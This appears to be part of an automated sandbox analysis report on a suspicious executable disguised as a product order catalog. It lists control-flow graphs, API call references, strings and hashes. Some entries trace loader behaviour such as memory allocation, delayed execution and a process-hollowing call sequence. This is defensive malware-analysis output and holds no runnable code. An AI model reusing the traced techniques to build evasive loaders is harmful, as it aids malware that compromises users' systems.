                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                • String ID: #$0$PGH
                                                                                                • API String ID: 423443420-3673556320
                                                                                                • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _fseek.LIBCMT ref: 004525DA
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                • __fread_nolock.LIBCMT ref: 00452618
                                                                                                • __fread_nolock.LIBCMT ref: 00452629
                                                                                                • __fread_nolock.LIBCMT ref: 00452644
                                                                                                • __fread_nolock.LIBCMT ref: 00452661
                                                                                                • _fseek.LIBCMT ref: 0045267D
                                                                                                • _malloc.LIBCMT ref: 00452689
                                                                                                • _malloc.LIBCMT ref: 00452696
                                                                                                • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1911931848-0
                                                                                                • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1356 40f450-40f45c call 425210 1359 40f460-40f478 1356->1359 1359->1359 1360 40f47a-40f4a8 call 413990 call 410f70 1359->1360 1365 40f4b0-40f4d1 call 4151b0 1360->1365 1368 40f531 1365->1368 1369 40f4d3-40f4da 1365->1369 1370 40f536-40f540 1368->1370 1371 40f4dc-40f4de 1369->1371 1372 40f4fd-40f517 call 41557c 1369->1372 1374 40f4e0-40f4e2 1371->1374 1375 40f51c-40f51f 1372->1375 1376 40f4e6-40f4ed 1374->1376 1375->1365 1377 40f521-40f52c 1376->1377 1378 40f4ef-40f4f2 1376->1378 1379 40f543-40f54e 1377->1379 1380 40f52e-40f52f 1377->1380 1381 42937a-4293a0 call 41557c call 4151b0 1378->1381 1382 40f4f8-40f4fb 1378->1382 1384 40f550-40f553 1379->1384 1385 40f555-40f560 1379->1385 1380->1378 1392 4293a5-4293c3 call 4151d0 1381->1392 1382->1372 1382->1374 1384->1378 1387 429372 1385->1387 1388 40f566-40f571 1385->1388 1387->1381 1390 429361-429367 1388->1390 1391 40f577-40f57a 1388->1391 1390->1376 1393 42936d 1390->1393 1391->1378 1392->1370 1393->1387
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock_fseek_strcat
                                                                                                • String ID: AU3!$EA06
                                                                                                • API String ID: 3818483258-2658333250
                                                                                                • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1396 410130-410142 SHGetMalloc 1397 410148-410158 SHGetDesktopFolder 1396->1397 1398 42944f-429459 call 411691 1396->1398 1399 4101d1-4101e0 1397->1399 1400 41015a-410188 call 411691 1397->1400 1399->1398 1406 4101e6-4101ee 1399->1406 1408 4101c5-4101ce 1400->1408 1409 41018a-4101a1 SHGetPathFromIDListW 1400->1409 1408->1399 1410 4101a3-4101b1 call 411691 1409->1410 1411 4101b4-4101c0 1409->1411 1410->1411 1411->1408
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                • String ID: C:\Users\user\Desktop\Products Order Catalogs20242.exe
                                                                                                • API String ID: 192938534-1795140943
                                                                                                • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1414 401230-40123b 1415 401241-401272 call 4131f0 call 401be0 1414->1415 1416 4012c5-4012cd 1414->1416 1421 401274-401292 1415->1421 1422 4012ae-4012bf KillTimer SetTimer 1415->1422 1423 42aa61-42aa67 1421->1423 1424 401298-40129c 1421->1424 1422->1416 1427 42aa8b-42aaa7 Shell_NotifyIconW 1423->1427 1428 42aa69-42aa86 Shell_NotifyIconW 1423->1428 1425 4012a2-4012a8 1424->1425 1426 42aaac-42aab3 1424->1426 1425->1422 1429 42aaf8-42ab15 Shell_NotifyIconW 1425->1429 1430 42aad7-42aaf3 Shell_NotifyIconW 1426->1430 1431 42aab5-42aad2 Shell_NotifyIconW 1426->1431 1427->1422 1428->1422 1429->1422 1430->1422 1431->1422
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00401257
                                                                                                  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                                  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                                  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                • KillTimer.USER32(?,?), ref: 004012B0
                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                                                • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                                                • String ID:
                                                                                                • API String ID: 1792922140-0
                                                                                                • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                                                • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                                                • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1432 40d0648-40d06f6 call 40ce008 1435 40d06fd-40d0723 call 40d1558 CreateFileW 1432->1435 1438 40d072a-40d073a 1435->1438 1439 40d0725 1435->1439 1444 40d073c 1438->1444 1445 40d0741-40d075b VirtualAlloc 1438->1445 1440 40d0875-40d0879 1439->1440 1442 40d08bb-40d08be 1440->1442 1443 40d087b-40d087f 1440->1443 1446 40d08c1-40d08c8 1442->1446 1447 40d088b-40d088f 1443->1447 1448 40d0881-40d0884 1443->1448 1444->1440 1449 40d075d 1445->1449 1450 40d0762-40d0779 ReadFile 1445->1450 1451 40d091d-40d0932 1446->1451 1452 40d08ca-40d08d5 1446->1452 1453 40d089f-40d08a3 1447->1453 1454 40d0891-40d089b 1447->1454 1448->1447 1449->1440 1459 40d077b 1450->1459 1460 40d0780-40d07c0 VirtualAlloc 1450->1460 1455 40d0934-40d093f VirtualFree 1451->1455 1456 40d0942-40d094a 1451->1456 1461 40d08d9-40d08e5 1452->1461 1462 40d08d7 1452->1462 1457 40d08a5-40d08af 1453->1457 1458 40d08b3 1453->1458 1454->1453 1455->1456 1457->1458 1458->1442 1459->1440 1463 40d07c7-40d07e2 call 40d17a8 1460->1463 1464 40d07c2 1460->1464 1465 40d08f9-40d0905 1461->1465 1466 40d08e7-40d08f7 1461->1466 1462->1451 1472 40d07ed-40d07f7 1463->1472 1464->1440 1469 40d0907-40d0910 1465->1469 1470 40d0912-40d0918 1465->1470 1468 40d091b 1466->1468 1468->1446 1469->1468 1470->1468 1473 40d07f9-40d0828 call 40d17a8 1472->1473 1474 40d082a-40d083e call 40d15b8 1472->1474 1473->1472 1480 40d0840 1474->1480 1481 40d0842-40d0846 1474->1481 1480->1440 1482 40d0848-40d084c CloseHandle 1481->1482 1483 40d0852-40d0856 1481->1483 1482->1483 1484 40d0858-40d0863 VirtualFree 1483->1484 1485 40d0866-40d086f 1483->1485 1484->1485 1485->1435 1485->1440
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040D0719
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040D093F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 204039940-0
                                                                                                • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                • Instruction ID: 63cfd5f38a651bffa951f0cc15c7a22338d3c0673a5d8496af69589588ab5c27
                                                                                                • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                • Instruction Fuzzy Hash: 6BA10A74E00309EBEB14CFA4C894BEEB7B5BF48308F208169E555BB280D775AA45CF95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1486 414f10-414f2c 1487 414f4f 1486->1487 1488 414f2e-414f31 1486->1488 1490 414f51-414f55 1487->1490 1488->1487 1489 414f33-414f35 1488->1489 1491 414f37-414f46 call 417f23 1489->1491 1492 414f56-414f5b 1489->1492 1503 414f47-414f4c call 417ebb 1491->1503 1494 414f6a-414f6d 1492->1494 1495 414f5d-414f68 1492->1495 1498 414f7a-414f7c 1494->1498 1499 414f6f-414f77 call 4131f0 1494->1499 1495->1494 1497 414f8b-414f9e 1495->1497 1501 414fa0-414fa6 1497->1501 1502 414fa8 1497->1502 1498->1491 1500 414f7e-414f89 1498->1500 1499->1498 1500->1491 1500->1497 1505 414faf-414fb1 1501->1505 1502->1505 1503->1487 1508 4150a1-4150a4 1505->1508 1509 414fb7-414fbe 1505->1509 1508->1490 1511 414fc0-414fc5 1509->1511 1512 415004-415007 1509->1512 1511->1512 1513 414fc7 1511->1513 1514 415071-415072 call 41e6b1 1512->1514 1515 415009-41500d 1512->1515 1518 415102 1513->1518 1519 414fcd-414fd1 1513->1519 1521 415077-41507b 1514->1521 1516 41500f-415018 1515->1516 1517 41502e-415035 1515->1517 1522 415023-415028 1516->1522 1523 41501a-415021 1516->1523 1525 415037 1517->1525 1526 415039-41503c 1517->1526 1524 415106-41510f 1518->1524 1527 414fd3 1519->1527 1528 414fd5-414fd8 1519->1528 1521->1524 1529 415081-415085 1521->1529 1530 41502a-41502c 1522->1530 1523->1530 1524->1490 1525->1526 1531 415042-41504e call 41453a call 41ed9e 1526->1531 1532 4150d5-4150d9 1526->1532 1527->1528 1533 4150a9-4150af 1528->1533 1534 414fde-414fff call 41ee9b 1528->1534 1529->1532 1535 415087-415096 1529->1535 1530->1526 1554 415053-415058 1531->1554 1540 4150eb-4150fd call 417f23 1532->1540 1541 4150db-4150e8 call 4131f0 1532->1541 1536 4150b1-4150bd call 4131f0 1533->1536 1537 4150c0-4150d0 call 417f23 1533->1537 1543 415099-41509b 1534->1543 1535->1543 1536->1537 1537->1503 1540->1503 1541->1540 1543->1508 1543->1509 1555 415114-415118 1554->1555 1556 41505e-415061 1554->1556 1555->1524 1556->1518 1557 415067-41506f 1556->1557 1557->1543
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 3886058894-0
                                                                                                • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1558 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CreateShow
                                                                                                • String ID: AutoIt v3$edit
                                                                                                • API String ID: 1584632944-3779509399
                                                                                                • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1559 40d03b8-40d0542 call 40ce008 call 40d02a8 CreateFileW 1566 40d0549-40d0559 1559->1566 1567 40d0544 1559->1567 1570 40d055b 1566->1570 1571 40d0560-40d057a VirtualAlloc 1566->1571 1568 40d05fc-40d0601 1567->1568 1570->1568 1572 40d057c 1571->1572 1573 40d057e-40d0598 ReadFile 1571->1573 1572->1568 1574 40d059c-40d05d6 call 40d02e8 call 40cf2a8 1573->1574 1575 40d059a 1573->1575 1580 40d05d8-40d05ed call 40d0338 1574->1580 1581 40d05f2-40d05fa ExitProcess 1574->1581 1575->1568 1580->1581 1581->1568
                                                                                                APIs
                                                                                                  • Part of subcall function 040D02A8: Sleep.KERNELBASE(000001F4), ref: 040D02B9
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040D0535
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFileSleep
                                                                                                • String ID: 8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST
                                                                                                • API String ID: 2694422964-777297816
                                                                                                • Opcode ID: 02f154a342ebaf9c0fb6168801af5ffbc0840ee4d53e4723a5283cd0007ddc9b
                                                                                                • Instruction ID: b66ba80ecc8c93d0dcb4aab80243331ab40dbf1c0500afc023f34ab319ac4cd7
                                                                                                • Opcode Fuzzy Hash: 02f154a342ebaf9c0fb6168801af5ffbc0840ee4d53e4723a5283cd0007ddc9b
                                                                                                • Instruction Fuzzy Hash: 42716230D04389DAEF11DBA4D8447EFBF75AF19308F004199E6587B2C1D7BA1A49CB66

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1583 413a88-413a99 call 41718c 1586 413b10-413b15 call 4171d1 1583->1586 1587 413a9b-413aa2 1583->1587 1588 413aa4-413abc call 418407 call 419f6d 1587->1588 1589 413ae7 1587->1589 1601 413ac7-413ad7 call 413ade 1588->1601 1602 413abe-413ac6 call 419f9d 1588->1602 1593 413ae8-413af8 RtlFreeHeap 1589->1593 1593->1586 1595 413afa-413b0f call 417f23 GetLastError call 417ee1 1593->1595 1595->1586 1601->1586 1608 413ad9-413adc 1601->1608 1602->1601 1608->1593
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 00413AA6
                                                                                                  • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                  • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                  • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                • String ID:
                                                                                                • API String ID: 2714421763-0
                                                                                                • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                APIs
                                                                                                  • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                  • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                • _strcat.LIBCMT ref: 0040F603
                                                                                                  • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                  • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                • String ID: HH
                                                                                                • API String ID: 1194219731-2761332787
                                                                                                • Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                                • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                • Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                                • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040CFA63
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040CFAF9
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040CFB1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                                                                • Instruction ID: afb9be1a5b21caf9c5de8f00e8aa851ea91f6598758ee553ba29c682cbe2e99d
                                                                                                • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
